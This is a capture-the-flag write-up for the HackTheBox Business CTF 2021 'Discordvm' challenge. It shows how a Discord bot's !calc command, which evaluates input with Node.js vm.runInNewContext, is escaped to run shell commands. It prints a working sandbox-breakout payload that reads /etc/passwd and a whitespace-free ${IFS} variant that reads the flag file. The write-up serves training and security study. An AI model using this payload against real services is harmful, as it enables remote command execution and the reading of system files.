HackTheBox Business CTF 2021 - Discordvm (Misc)

July 26, 2021 less than 1 minute read

Discordvm is a misc challenge from HackTheBox Business CTF 2021. This challenge is talking about how to vm module breakout on nodejs.

Click challenge information Discordvm

Click the url, it will navigate to a discord channel Discordvm

Let’s send a message to discordvm

when we to execute the program using with !calc, for example !calc 1+1 will show the output from discordvm 1+1=2. Let’s analyze the source codes

const vm = require('vm');
const payload = '1+1';
console.log(vm.runInNewContext(payload));

and we follow the intructions from NodeJS Red Team Cheat Sheet or Sandboxing NodeJS is hard, here is why

vm module breakout (by pwnisher)

"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);

we need this const

process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()

we got an error Discordvm

modify without whitespace like this

process=this.constructor.constructor('return(this.process)')();process.mainModule.require('child_process').execSync('cat${IFS}flag.txt').toString()

Discordvm

twseptian

HackTheBox Business CTF 2021 - Discordvm (Misc)

You may also enjoy

Pengalaman Ujian Sertifikasi CEH Practical

Online Railway Reservation System 1.0 - ‘id’ SQL Injection (Unauthenticated)

Online Veterinary Appointment System 1.0 - ‘Multiple’ SQL Injection

Hospitals Patient Records Management System 1.0 - ‘id’ SQL Injection (Authenticated)